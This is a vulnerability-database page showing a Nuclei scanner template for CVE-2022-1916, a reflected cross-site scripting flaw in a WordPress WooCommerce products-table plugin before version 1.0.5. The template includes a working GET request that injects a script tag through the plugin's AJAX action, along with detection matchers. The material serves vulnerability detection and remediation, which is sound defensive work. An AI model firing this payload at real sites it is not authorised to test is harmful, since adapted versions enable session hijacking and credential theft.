Lucene search
K

WordPress Active Products Tables for WooCommerce <1.0.5 - Cross-Site Scripting

🗓️ 02 Jul 2026 09:36:57Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 18 Views

WordPress Active Products Tables for WooCommerce <1.0.5 - Cross-Site Scripting. Unsanitized parameter allows arbitrary script injection for session hijacking and sensitive information theft

Related
Refs
Code
id: CVE-2022-1916

info:
  name: WordPress Active Products Tables for WooCommerce <1.0.5 - Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: |
    WordPress Active Products Tables for WooCommerce plugin prior to 1.0.5 contains a cross-site scripting vulnerability.. The plugin does not sanitize and escape a parameter before outputting it back in the response of an AJAX action, An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update to version 1.0.5 or later of the WordPress Active Products Tables for WooCommerce plugin to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/d16a0c3d-4318-4ecd-9e65-fc4165af8808
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1916
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-1916
    cwe-id: CWE-79
    epss-score: 0.01829
    epss-percentile: 0.76203
    cpe: cpe:2.3:a:pluginus:woot:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: pluginus
    product: woot
    framework: wordpress
  tags: cve,cve2022,wordpress,wp-plugin,xss,wpscan,wp,pluginus,vkev,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\u003cscript%3Ealert(document.domain)\u003c/script%3E%22}'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'

      - type: word
        part: body
        words:
          - 'woot-content-in-popup'
          - 'woot-system'
          - 'woot-table'
        condition: or

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100dbd90d9a6c73921b93d67bcc522ef295cabe3792bcc8670b562ee7089e14a0c302210080ee1982f30e8900db9ca1641cd457df98e2df4261c2d6f8818be28f4412fe15:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 24.3
CVSS 3.16.1
EPSS0.01829
18